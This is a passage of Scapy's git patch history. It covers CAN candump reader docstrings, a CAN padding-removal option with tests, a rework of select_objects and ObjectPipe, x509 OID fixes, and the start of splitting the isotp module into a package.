reader. Each packet is returned as a CAN packet. + + Creates a CandumpReader object + + :param filename: filename of a candump logfile, compressed or + uncompressed, or a already opened file object. + :param interface: Name of a interface, if candump contains messages + of multiple interfaces and only one messages from a + specific interface are wanted. + """ nonblocking_socket = True @@ -398,6 +480,21 @@ def __iter__(self): @staticmethod def open(filename): # type: (Union[IO[bytes], str]) -> Tuple[str, _ByteStream] + """Open function to handle three types of input data. + + If filename of a regular candump log file is provided, this function + opens the file and returns the file object. + If filename of a gzip compressed candump log file is provided, the + required gzip open function is used to obtain the necessary file + object, which gets returned. + If a fileobject or ByteIO is provided, the filename is gathered for + internal use. No further steps are performed on this object. + + :param filename: Can be a string, specifying a candump log file or a + gzip compressed candump log file. Also already opened + file objects are allowed. + :return: A opened file object for further use. + """ """Open (if necessary) filename.""" if isinstance(filename, str): try: @@ -414,7 +511,9 @@ def open(filename): def next(self): # type: () -> Packet - """implement the iterator protocol on a set of packets + """Implements the iterator protocol on a set of packets + + :return: Next readable CAN Packet from the specified file """ try: pkt = None @@ -428,9 +527,13 @@ def next(self): def read_packet(self, size=CAN_MTU): # type: (int) -> Optional[Packet] - """return a single packet read from the file or None if filters apply + """Read a packet from the specified file. + + This function will raise EOFError when no more packets are available. - raise EOFError when no more packets are available + :param size: Not used. Just here to follow the function signature for + SuperSocket emulation. + :return: A single packet read from the file or None if filters apply """ line = self.f.readline() line = line.lstrip() @@ -472,7 +575,7 @@ def read_packet(self, size=CAN_MTU): def dispatch(self, callback): # type: (Callable[[Packet], None]) -> None - """call the specified callback routine for each packet read + """Call the specified callback routine for each packet read This is just a convenience function for the main loop that allows for easy launching of packet processing in a @@ -483,7 +586,11 @@ def dispatch(self, callback): def read_all(self, count=-1): # type: (int) -> PacketList - """return a list of all packets in the candump file + """Read a specific number or all packets from a candump file. + + :param count: Specify a specific number of packets to be read. + All packets can be read by count=-1. + :return: A PacketList object containing read CAN messages """ res = [] while count != 0: @@ -499,16 +606,17 @@ def read_all(self, count=-1): def recv(self, size=CAN_MTU): # type: (int) -> Optional[Packet] - """ Emulate a socket - """ + """Emulation of SuperSocket""" return self.read_packet(size=size) def fileno(self): # type: () -> int + """Emulation of SuperSocket""" return self.f.fileno() def close(self): # type: () -> Any + """Emulation of SuperSocket""" return self.f.close() def __enter__(self): @@ -519,8 +627,8 @@ def __exit__(self, exc_type, exc_value, tracback): # type: (Optional[Type[BaseException]], Optional[BaseException], Optional[Any]) -> None # noqa: E501 self.close() - # emulate SuperSocket @staticmethod def select(sockets, remain=None): # type: (List[SuperSocket], Optional[int]) -> List[SuperSocket] + """Emulation of SuperSocket""" return sockets diff --git a/scapy/supersocket.py b/scapy/supersocket.py index 4dff0ecf413..0271c10902b 100644 --- a/scapy/supersocket.py +++ b/scapy/supersocket.py @@ -40,7 +40,7 @@ Optional, Tuple, Type, - cast, + cast ) # Utils diff --git a/test/contrib/cansocket.uts b/test/contrib/cansocket.uts index 75120ec62bc..9799b612481 100644 --- a/test/contrib/cansocket.uts +++ b/test/contrib/cansocket.uts @@ -14,7 +14,7 @@ load_layer("can", globals_dict=globals()) from scapy.contrib.cansocket_python_can import PythonCANSocket from scapy.contrib.cansocket_native import NativeCANSocket -conf.contribs['CAN'] = {'swap-bytes': False} +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} = Setup string for vcan bashCommand = "/bin/bash -c 'sudo modprobe vcan; sudo ip link add name vcan0 type vcan; sudo ip link set dev vcan0 up'" diff --git a/test/contrib/cansocket_native.uts b/test/contrib/cansocket_native.uts index 77e23adf64b..48a34aa165f 100644 --- a/test/contrib/cansocket_native.uts +++ b/test/contrib/cansocket_native.uts @@ -13,7 +13,7 @@ load_layer("can", globals_dict=globals()) conf.contribs['CANSocket'] = {'use-python-can': False} from scapy.contrib.cansocket_native import * -conf.contribs['CAN'] = {'swap-bytes': False} +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} = Setup string for vcan @@ -37,7 +37,27 @@ bytes(canframe) == b'\x00\x00\x07\xff\x08\x00\x00\x00\x01\x02\x03\x04\x05\x06\x0 = CAN Socket Init sock1 = CANSocket(channel="vcan0") += CAN Socket send recv small packet without remove padding + +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': False} + +def sender(): + sleep(0.1) + sock2 = CANSocket(channel="vcan0") + sock2.send(CAN(identifier=0x7ff,length=1,data=b'\x01')) + sock2.close() + +thread = threading.Thread(target=sender) +thread.start() +rx = sock1.recv() +print(repr(rx)) +rx == CAN(identifier=0x7ff,length=1,data=b'\x01') / Padding(b"\x00" * 7) +thread.join(timeout=5) + = CAN Socket send recv small packet + +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} + def sender(): sleep(0.1) sock2 = CANSocket(channel="vcan0") @@ -47,6 +67,7 @@ def sender(): thread = threading.Thread(target=sender) thread.start() rx = sock1.recv() +print(repr(rx)) rx == CAN(identifier=0x7ff,length=1,data=b'\x01') thread.join(timeout=5) diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index 3282c1ddaac..a17cf0d4e22 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -11,7 +11,7 @@ = Load module ~ conf -conf.contribs['CAN'] = {'swap-bytes': False} +conf.contribs['CAN'] = {'swap-bytes': False, 'remove-padding': True} load_layer("can", globals_dict=globals()) conf.contribs['CANSocket'] = {'use-python-can': True} from scapy.contrib.cansocket_python_can import * diff --git a/test/scapy/layers/can.uts b/test/scapy/layers/can.uts index 8fb734ade3e..d2b1aeb1dd7 100644 --- a/test/scapy/layers/can.uts +++ b/test/scapy/layers/can.uts @@ -69,11 +69,12 @@ set(pkt.length for pkt in packets) == {1, 2, 8} ############ ############ -+ swap-bytes functionality (for PF_CAN socket interactions) ++ swap-bytes and remove-padding functionality (for PF_CAN socket interactions) = read PCAP of a CookedLinux/SocketCAN capture (CAN standard and extended) conf.contribs['CAN']['swap-bytes'] = True +conf.contribs['CAN']['remove-padding'] = False pcap_fd_can_a = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00q\x00\x00\x00\x15f`Zv\xde\n\x00 \x00\x00\x00 \x00\x00\x00\x00\x01\x01\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\xdf\x07\x00\x00\x03\x00\x00\x00\x02\x01\r\x00\x00\x00\x00\x00') packets_can_a = rdpcap(pcap_fd_can_a) pcap_fd_can_b = BytesIO(b'\xd4\xc3\xb2\xa1\x02\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00q\x00\x00\x00\xf4i`Z\xf3\x99\x07\x00 \x00\x00\x00 \x00\x00\x00\x00\x01\x01\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c\xf13\xdb\x98\x03\x00\x00\x00\x02\x01\r\x00\x00\x00\x00\x00') @@ -116,9 +117,13 @@ p_too_much_data = CAN(flags='error', length=1, identifier=1234, data=b'\x01\x02' p = CAN(bytes(p_too_much_data)) p.haslayer('Padding') and p['Padding'].load == b'\x02' ++ rdcandump = Check rdcandump default * default reading + +conf.contribs['CAN']['remove-padding'] = True + pcap_fd = BytesIO(b'''(1539191392.761779) vcan0 123#11223344 (1539191470.820239) vcan0 123#11223344 (1539191471.503168) vcan0 123#11223344 diff --git a/tox.ini b/tox.ini index 91a2e518068..6aea6a4a8af 100644 --- a/tox.ini +++ b/tox.ini @@ -75,7 +75,7 @@ skip_install = true changedir = doc/scapy deps = sphinx commands = - sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/cansocket* ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py + sphinx-apidoc -f --no-toc -d 1 --separate --module-first --templatedir=_templates --output-dir api ../../scapy ../../scapy/modules/ ../../scapy/libs/ ../../scapy/tools/ ../../scapy/arch/ ../../scapy/contrib/scada/* ../../scapy/all.py ../../scapy/layers/all.py ../../scapy/compat.py [testenv:mypy] From 100b2ca7d01128e059330d34f11d4b01d2744c7e Mon Sep 17 00:00:00 2001 From: Alexander Stevenson Date: Wed, 5 May 2021 11:57:22 -0400 Subject: [PATCH 0572/1632] Fixed typo (#3201) --- doc/scapy/usage.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy/usage.rst b/doc/scapy/usage.rst index 7ebb5c952fc..45266430fe1 100644 --- a/doc/scapy/usage.rst +++ b/doc/scapy/usage.rst @@ -276,7 +276,7 @@ Injecting bytes .. index:: single: RawVal -In a packet, each field has a specific type. For instance, the length field of the IP packet ``len`` expects an integer. More on that later. If you're developping a PoC, there are times where you'll want to inject some value that doesn't fit that type. This is possible using ``RawVal`` +In a packet, each field has a specific type. For instance, the length field of the IP packet ``len`` expects an integer. More on that later. If you're developing a PoC, there are times where you'll want to inject some value that doesn't fit that type. This is possible using ``RawVal`` .. code:: From 93d3dd90b944f913d8cf8564974749775cb8db37 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 11 May 2021 15:54:10 +0200 Subject: [PATCH 0573/1632] Disable xcpscanner tests on PyPy --- test/tools/xcpscanner.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/tools/xcpscanner.uts b/test/tools/xcpscanner.uts index 10067433e53..9cceb43a74b 100644 --- a/test/tools/xcpscanner.uts +++ b/test/tools/xcpscanner.uts @@ -1,5 +1,5 @@ % Regression tests for the XCP_CAN -~ needs_root +~ needs_root not_pypy # More information at http://www.secdev.org/projects/UTscapy/ From 4267e400df06c4b0c6a07e139634ea42a73939a9 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Tue, 11 May 2021 00:55:16 +0200 Subject: [PATCH 0574/1632] Overhaul select_object --- scapy/arch/libpcap.py | 5 +- scapy/arch/windows/native.py | 6 +- scapy/automaton.py | 175 ++++++++++++++++--------------- scapy/contrib/isotp.py | 12 +-- scapy/pipetool.py | 6 +- scapy/scapypipes.py | 6 -- scapy/utils.py | 4 +- test/pipetool.uts | 26 +++-- test/run_tests.bat | 1 + test/tls/tests_tls_netaccess.uts | 2 +- 10 files changed, 115 insertions(+), 128 deletions(-) diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index ab8203061ef..98f80c32528 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -13,7 +13,7 @@ import struct import time -from scapy.automaton import SelectableObject, select_objects +from scapy.automaton import select_objects from scapy.compat import raw, plain_str from scapy.config import conf from scapy.consts import WINDOWS @@ -60,9 +60,8 @@ ] -class _L2libpcapSocket(SuperSocket, SelectableObject): +class _L2libpcapSocket(SuperSocket): def __init__(self): - SelectableObject.__init__(self) self.cls = None def recv_raw(self, x=MTU): diff --git a/scapy/arch/windows/native.py b/scapy/arch/windows/native.py index b8788fbc653..e4dc4c38c8a 100644 --- a/scapy/arch/windows/native.py +++ b/scapy/arch/windows/native.py @@ -49,7 +49,7 @@ import subprocess import time -from scapy.automaton import SelectableObject, select_objects +from scapy.automaton import select_objects from scapy.arch.windows.structures import GetIcmpStatistics from scapy.compat import raw from scapy.config import conf @@ -61,10 +61,10 @@ # Watch out for import loops (inet...) -class L3WinSocket(SuperSocket, SelectableObject): +class L3WinSocket(SuperSocket): desc = "a native Layer 3 (IPv4) raw socket under Windows" nonblocking_socket = True - __selectable_force_select__ = True + __selectable_force_select__ = True # see automaton.py __slots__ = ["promisc", "cls", "ipv6", "proto"] def __init__(self, iface=None, proto=socket.IPPROTO_IP, diff --git a/scapy/automaton.py b/scapy/automaton.py index 6ea67bb0b35..8d1df840ea7 100644 --- a/scapy/automaton.py +++ b/scapy/automaton.py @@ -35,44 +35,25 @@ import scapy.modules.six as six -class SelectableObject(object): - if WINDOWS: - def __init__(self): - self._fd = ctypes.windll.kernel32.CreateEventA( - None, 0, 0, - "SelectableObject %s" % random.random() - ) - - def call_release(self): - if ctypes.windll.kernel32.PulseEvent( - ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) - - def _close_fd(self): - if self._fd and ctypes.windll.kernel32.CloseHandle( - ctypes.c_void_p(self._fd)) == 0: - warning(ctypes.FormatError()) - self._fd = None +def select_objects(inputs, remain): + """ + Select objects. Same than: + ``select.select(inputs, [], [], remain)`` - def __del__(self): - if hasattr(self, "_fd"): - self._close_fd() - else: - def call_release(self): - pass + But also works on Windows, only on objects whose fileno() returns + a Windows event. For simplicity, just use `ObjectPipe()` as a queue + that you can select on whatever the platform is. - def close(self): - pass + If you want an object to be always included in the output of + select_objects (i.e. it's not selectable), just make fileno() + return a strictly negative value. - def check_recv(self): - return False + Example: - -def select_objects(inputs, remain): - """ - Select SelectableObject objects. Same than: - ``select.select(inputs, [], [], remain)`` - But also works on Windows, only on SelectableObject. + >>> a, b = ObjectPipe("a"), ObjectPipe("b") + >>> b.send("test") + >>> select_objects([a, b], 1) + [b] :param inputs: objects to process :param remain: timeout. If 0, return []. @@ -81,21 +62,16 @@ def select_objects(inputs, remain): return select.select(inputs, [], [], remain)[0] natives = [] events = [] - results = [] + results = set() for i in list(inputs): if getattr(i, "__selectable_force_select__", False): natives.append(i) - elif isinstance(i, SelectableObject): - if i.check_recv(): - results.append(i) - else: - events.append(i) + elif i.fileno() < 0: + results.add(i) else: - raise TypeError( - "Invalid type: %s (must extend SelectableObject)" - ) + events.append(i) if natives: - results.extend(select.select(natives, [], [], remain)[0]) + results = results.union(set(select.select(natives, [], [], remain)[0])) if events: remainms = int((remain or 0) * 1000) if len(events) == 1: @@ -104,6 +80,9 @@ def select_objects(inputs, remain): remainms ) else: + # Sadly, the only way to emulate select() is to first check + # if any object is available using WaitForMultipleObjects + # then poll the others. res = ctypes.windll.kernel32.WaitForMultipleObjects( len(events), (ctypes.c_void_p * len(events))( @@ -113,16 +92,49 @@ def select_objects(inputs, remain): remainms ) if res != 0xFFFFFFFF and res != 0x00000102: # Failed or Timeout - results.append(events[res]) - return results - - -class ObjectPipe(SelectableObject): - def __init__(self): + results.add(events[res]) + if len(events) > 1: + # Now poll the others, if any + for evt in events: + res = ctypes.windll.kernel32.WaitForSingleObject( + ctypes.c_void_p(evt.fileno()), + 0 # poll: don't wait + ) + if res == 0: + results.add(evt) + return list(results) + + +class ObjectPipe: + def __init__(self, name=None): + self.name = name or "ObjectPipe" self._closed = False self.__rd, self.__wr = os.pipe() self.__queue = deque() - SelectableObject.__init__(self) + if WINDOWS: + self._wincreate() + + def _wincreate(self): + self._fd = ctypes.windll.kernel32.CreateEventA( + None, True, False, + ctypes.create_string_buffer(b"ObjectPipe %f" % random.random()) + ) + + def _winset(self): + if ctypes.windll.kernel32.SetEvent( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + + def _winreset(self): + if ctypes.windll.kernel32.ResetEvent( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + + def _winclose(self): + if self._fd and ctypes.windll.kernel32.CloseHandle( + ctypes.c_void_p(self._fd)) == 0: + warning(ctypes.FormatError()) + self._fd = None def fileno(self): if WINDOWS: @@ -132,25 +144,27 @@ def fileno(self): def send(self, obj): self.__queue.append(obj) + if WINDOWS: + self._winset() os.write(self.__wr, b"X") - self.call_release() def write(self, obj): self.send(obj) + def empty(self): + return not bool(self.__queue) + def flush(self): pass - def check_recv(self): - return bool(self.__queue) - def recv(self, n=0): if self._closed: - if self.check_recv(): - return self.__queue.popleft() return None os.read(self.__rd, 1) - return self.__queue.popleft() + elt = self.__queue.popleft() + if WINDOWS and not self.__queue: + self._winreset() + return elt def read(self, n=0): return self.recv(n) @@ -162,7 +176,10 @@ def close(self): os.close(self.__wr) self.__queue.clear() if WINDOWS: - self._close_fd() + self._winclose() + + def __repr__(self): + return "<%s at %s>" % (self.name, id(self)) def __del__(self): self.close() @@ -344,13 +361,13 @@ class _ATMT_Command: REJECT = "REJECT" -class _ATMT_supersocket(SuperSocket, SelectableObject): +class _ATMT_supersocket(SuperSocket): def __init__(self, name, ioevent, automaton, proto, *args, **kargs): self.name = name self.ioevent = ioevent self.proto = proto # write, read - self.spa, self.spb = ObjectPipe(), ObjectPipe() + self.spa, self.spb = ObjectPipe("spa"), ObjectPipe("spb") kargs["external_fd"] = {ioevent: (self.spa, self.spb)} kargs["is_atmt_socket"] = True self.atmt = automaton(*args, **kargs) @@ -361,9 +378,6 @@ def send(self, s): s = bytes(s) self.spa.send(s) - def check_recv(self): - return self.spb.check_recv() - def fileno(self): return self.spb.fileno() @@ -534,7 +548,7 @@ def my_send(self, pkt): self.send_sock.send(pkt) # Utility classes and exceptions - class _IO_fdwrapper(SelectableObject): + class _IO_fdwrapper: def __init__(self, rd, wr): if rd is not None and not isinstance(rd, (int, ObjectPipe)): rd = rd.fileno() @@ -542,16 +556,12 @@ def __init__(self, rd, wr): wr = wr.fileno() self.rd = rd self.wr = wr - SelectableObject.__init__(self) def fileno(self): if isinstance(self.rd, ObjectPipe): return self.rd.fileno() return self.rd - def check_recv(self): - return self.rd.check_recv() - def read(self, n=65535): if isinstance(self.rd, ObjectPipe): return self.rd.recv(n) @@ -559,8 +569,7 @@ def read(self, n=65535): def write(self, msg): if isinstance(self.wr, ObjectPipe): - self.wr.send(msg) - return + return self.wr.send(msg) return os.write(self.wr, msg) def recv(self, n=65535): @@ -569,19 +578,15 @@ def recv(self, n=65535): def send(self, msg): return self.write(msg) - class _IO_mixer(SelectableObject): + class _IO_mixer: def __init__(self, rd, wr): self.rd = rd self.wr = wr - SelectableObject.__init__(self) def fileno(self): - if isinstance(self.rd, int): - return self.rd - return self.rd.fileno() - - def check_recv(self): - return self.rd.check_recv() + if isinstance(self.rd, ObjectPipe): + return self.rd.fileno() + return self.rd def recv(self, n=None): return self.rd.recv(n) @@ -673,8 +678,8 @@ def __init__(self, *args, **kargs): self.init_kargs = kargs self.io = type.__new__(type, "IOnamespace", (), {}) self.oi = type.__new__(type, "IOnamespace", (), {}) - self.cmdin = ObjectPipe() - self.cmdout = ObjectPipe() + self.cmdin = ObjectPipe("cmdin") + self.cmdout = ObjectPipe("cmdout") self.ioin = {} self.ioout = {} for n in self.ionames: @@ -683,12 +688,12 @@ def __init__(self, *args, **kargs): extfd = (extfd, extfd) ioin, ioout = extfd if ioin is None: - ioin = ObjectPipe() - elif not isinstance(ioin, SelectableObject): + ioin = ObjectPipe("ioin") + else: ioin = self._IO_fdwrapper(ioin, None) if ioout is None: - ioout = ObjectPipe() - elif not isinstance(ioout, SelectableObject): + ioout = ObjectPipe("ioout") + else: ioout = self._IO_fdwrapper(None, ioout) self.ioin[n] = ioin diff --git a/scapy/contrib/isotp.py b/scapy/contrib/isotp.py index 9ef36047110..a2e8f64c588 100644 --- a/scapy/contrib/isotp.py +++ b/scapy/contrib/isotp.py @@ -31,7 +31,6 @@ from scapy.compat import chb, orb from scapy.layers.can import CAN, CAN_MAX_IDENTIFIER, CAN_MTU, CAN_MAX_DLEN import scapy.modules.six as six -import scapy.automaton as automaton from scapy.modules.six.moves import queue from scapy.error import Scapy_Exception, warning, log_loading, log_runtime from scapy.supersocket import SuperSocket @@ -1175,7 +1174,7 @@ def __ge__(self, other): ISOTP_FC_OVFLW = 2 # /* overflow */ -class ISOTPSocketImplementation(automaton.SelectableObject): +class ISOTPSocketImplementation: """ Implementation of an ISOTP "state machine". @@ -1222,8 +1221,6 @@ def __init__(self, listen_only=False # type: bool ): # type: (...) -> None - automaton.SelectableObject.__init__(self) - self.can_socket = can_socket self.dst_id = dst_id self.src_id = src_id @@ -1491,7 +1488,6 @@ def _recv_sf(self, data, ts): self.rx_queue.put((msg, ts)) for cb in self.rx_callbacks: cb(msg) - self.call_release() def _recv_ff(self, data, ts): # type: (bytes, Union[float, EDecimal]) -> None @@ -1589,7 +1585,6 @@ def _recv_cf(self, data): self.rx_queue.put((self.rx_buf, self.rx_ts)) for cb in self.rx_callbacks: cb(self.rx_buf) - self.call_release() self.rx_buf = None return @@ -1680,11 +1675,6 @@ def recv(self, timeout=None): except queue.Empty: return None - def check_recv(self): - # type: () -> bool - """Implementation for SelectableObject""" - return not self.rx_queue.empty() - if six.PY3 and LINUX: diff --git a/scapy/pipetool.py b/scapy/pipetool.py index 89fe7bae03e..70b8d202b72 100644 --- a/scapy/pipetool.py +++ b/scapy/pipetool.py @@ -41,7 +41,7 @@ def list_pipes_detailed(cls): print("###### %s" % pn) def __init__(self, *pipes): - ObjectPipe.__init__(self) + ObjectPipe.__init__(self, "PipeEngine") self.active_pipes = set() self.active_sources = set() self.active_drains = set() @@ -108,7 +108,7 @@ def run(self): RUN = True STOP_IF_EXHAUSTED = False while RUN and (not STOP_IF_EXHAUSTED or len(sources) > 1): - fds = select_objects(sources, 2) + fds = select_objects(sources, 0.5) for fd in fds: if fd is self: cmd = self._read_cmd() @@ -319,7 +319,7 @@ def __repr__(self): class Source(Pipe, ObjectPipe): def __init__(self, name=None): Pipe.__init__(self, name=name) - ObjectPipe.__init__(self) + ObjectPipe.__init__(self, name) self.is_exhausted = False def _read_message(self): diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 1cbd43cbde0..2cbc6d77022 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -57,9 +57,6 @@ def stop(self): def fileno(self): return self.s.fileno() - def check_recv(self): - return True - def deliver(self): try: pkt = self.s.recv() @@ -96,9 +93,6 @@ def stop(self): def fileno(self): return self.f.fileno() - def check_recv(self): - return True - def deliver(self): try: p = self.f.recv() diff --git a/scapy/utils.py b/scapy/utils.py index f56ade2b790..d2bac4ad4da 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1305,7 +1305,7 @@ def recv(self, size=MTU): def fileno(self): # type: () -> int - return self.f.fileno() + return -1 if WINDOWS else self.f.fileno() def close(self): # type: () -> Optional[Any] @@ -1689,7 +1689,7 @@ def __init__(self, def fileno(self): # type: () -> int - return self.f.fileno() + return -1 if WINDOWS else self.f.fileno() def write_header(self, pkt): # type: (Optional[Union[Packet, bytes]]) -> None diff --git a/test/pipetool.uts b/test/pipetool.uts index 522e7eb060a..2d4f1bb73a1 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -229,12 +229,12 @@ p.wait_and_stop() = Test SniffSource import mock -r, w = os.pipe() -os.write(w, b"X") +fd = ObjectPipe("sniffsource") +fd.write("test") @mock.patch("scapy.scapypipes.conf.L2listen") def _test(l2listen): - l2listen.return_value=Bunch(close=lambda *args: None, fileno=lambda: r, recv=lambda *args: Raw("data")) + l2listen.return_value=Bunch(close=lambda *args: None, fileno=lambda: fd.fileno(), recv=lambda *args: Raw("data")) p = PipeEngine() s = SniffSource() assert s.s is None @@ -251,13 +251,12 @@ def _test(l2listen): try: _test() finally: - os.close(r) - os.close(w) + fd.close() = Test SniffSource with socket -r, w = os.pipe() -os.write(w, b"X") +fd = ObjectPipe("sniffsource_socket") +fd.write("test") class FakeSocket(object): def __init__(self): @@ -268,7 +267,7 @@ class FakeSocket(object): self.times += 1 return Raw(b'hello') def fileno(self): - return r + return fd.fileno() try: p = PipeEngine() @@ -282,8 +281,7 @@ try: p.stop() assert raw(msg) == b'hello' finally: - os.close(r) - os.close(w) + fd.close() = Test SniffSource with invalid args @@ -322,7 +320,7 @@ except: = Test WiresharkSink ~ wiresharksink -q = ObjectPipe() +q = ObjectPipe("wiresharksink") pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() import mock @@ -344,7 +342,7 @@ popen.assert_called_once_with( ~ wiresharksink linktype = scapy.data.DLT_EN3MB -q = ObjectPipe() +q = ObjectPipe("wiresharksink_linktype") pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() import mock @@ -362,7 +360,7 @@ assert raw(pkt) in q.recv() ~ wiresharksink linktype = scapy.data.DLT_EN3MB -q = ObjectPipe() +q = ObjectPipe("wiresharksink_args") pkt = Ether(dst="aa:aa:aa:aa:aa:aa", src="bb:bb:bb:bb:bb:bb")/IP(dst="127.0.0.1", src="127.0.0.1")/ICMP() import mock @@ -667,7 +665,7 @@ p.stop() = FDSourceSink on a ObjectPipe object -obj = ObjectPipe() +obj = ObjectPipe("fdsourcesink") obj.send("hello") s = FDSourceSink(obj) diff --git a/test/run_tests.bat b/test/run_tests.bat index 623c9540ee1..41c6ebb3dfb 100644 --- a/test/run_tests.bat +++ b/test/run_tests.bat @@ -34,3 +34,4 @@ IF "%_args%" == "" ( ) REM ### Start UTScapy normally ### %PYTHON% "%MYDIR%\scapy\tools\UTscapy.py" %_args% +PAUSE diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 928e01ac9e5..f83c36cfe1c 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -123,7 +123,7 @@ def run_openssl_client(msg, suite="", version="", tls13=False, client_auth=False ) msg += b"\nstop_server\n" out = p.communicate(input=msg)[0] - print(out.decode()) + print(plain_str(out)) if p.returncode != 0: raise RuntimeError("OpenSSL returned with error code %s" % p.returncode) else: From 05555b8fa00f1032ec77a3ee5360cf4d8092b4d3 Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Fri, 14 May 2021 01:05:59 +0200 Subject: [PATCH 0575/1632] Fix sphinx doc --- scapy/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index d2bac4ad4da..ddd88eb4797 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1381,7 +1381,7 @@ class RawPcapNgReader(RawPcapReader): alternative = RawPcapReader # type: Type[Any] - PacketMetadata = collections.namedtuple("PacketMetadata", + PacketMetadata = collections.namedtuple("PacketMetadataNg", ["linktype", "tsresol", "tshigh", "tslow", "wirelen"]) From 32cd7eb0f620d9adf171c48d55514e8326a538d7 Mon Sep 17 00:00:00 2001 From: Martin Gallo Date: Tue, 11 May 2021 07:54:14 -0700 Subject: [PATCH 0576/1632] Added proper OIDs in defaul issuer, subject and directory name classes The defaul constructs were missing the proper set of the OID elements and instead used plain strings for the OID. --- scapy/layers/x509.py | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/scapy/layers/x509.py b/scapy/layers/x509.py index 46a741863e1..984a3344fc2 100644 --- a/scapy/layers/x509.py +++ b/scapy/layers/x509.py @@ -238,11 +238,11 @@ class X509_X400Address(ASN1_Packet): X509_RDN(), X509_RDN( rdn=[X509_AttributeTypeAndValue( - type="2.5.4.10", + type=ASN1_OID("2.5.4.10"), value=ASN1_PRINTABLE_STRING("Scapy, Inc."))]), X509_RDN( rdn=[X509_AttributeTypeAndValue( - type="2.5.4.3", + type=ASN1_OID("2.5.4.3"), value=ASN1_PRINTABLE_STRING("Scapy Default Name"))]) ] @@ -882,11 +882,11 @@ class ECDSAPrivateKey_OpenSSL(Packet): X509_RDN(), X509_RDN( rdn=[X509_AttributeTypeAndValue( - type="2.5.4.10", + type=ASN1_OID("2.5.4.10"), value=ASN1_PRINTABLE_STRING("Scapy, Inc."))]), X509_RDN( rdn=[X509_AttributeTypeAndValue( - type="2.5.4.3", + type=ASN1_OID("2.5.4.3"), value=ASN1_PRINTABLE_STRING("Scapy Default Issuer"))]) ] @@ -894,11 +894,11 @@ class ECDSAPrivateKey_OpenSSL(Packet): X509_RDN(), X509_RDN( rdn=[X509_AttributeTypeAndValue( - type="2.5.4.10", + type=ASN1_OID("2.5.4.10"), value=ASN1_PRINTABLE_STRING("Scapy, Inc."))]), X509_RDN( rdn=[X509_AttributeTypeAndValue( - type="2.5.4.3", + type=ASN1_OID("2.5.4.3"), value=ASN1_PRINTABLE_STRING("Scapy Default Subject"))]) ] From fc3aa3f9f0db583c66cc11791727e44682aef936 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 17 May 2021 13:33:42 +0200 Subject: [PATCH 0577/1632] Split of isotp.py (#3188) --- .config/mypy/mypy_enabled.txt | 8 +- doc/scapy/layers/automotive.rst | 10 +- scapy/contrib/automotive/kwp.py | 2 +- scapy/contrib/isotp.py | 2484 ------------------- scapy/contrib/isotp/__init__.py | 43 + scapy/contrib/isotp/isotp_native_socket.py | 362 +++ scapy/contrib/isotp/isotp_packet.py | 296 +++ scapy/contrib/isotp/isotp_scanner.py | 477 ++++ scapy/contrib/isotp/isotp_soft_socket.py | 1047 ++++++++ scapy/contrib/isotp/isotp_utils.py | 342 +++ scapy/tools/automotive/isotpscanner.py | 20 +- test/contrib/automotive/interface_mockup.py | 2 +- test/contrib/isotp.uts | 4 +- test/contrib/isotpscan.uts | 172 +- 14 files changed, 2677 insertions(+), 2592 deletions(-) delete mode 100644 scapy/contrib/isotp.py create mode 100644 scapy/contrib/isotp/__init__.py create mode 100644 scapy/contrib/isotp/isotp_native_socket.py create mode 100644 scapy/contrib/isotp/isotp_packet.py create mode 100644 scapy/contrib/isotp/isotp_scanner.py create mode 100644 scapy/contrib/isotp/isotp_soft_socket.py create mode 100644 scapy/contrib/isotp/isotp_utils.py diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index ab12e606b19..50d1c5a8ee6 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -38,7 +38,6 @@ scapy/layers/can.py scapy/layers/l2.py # CONTRIB -#scapy/contrib/http2.py # needs to be fixed 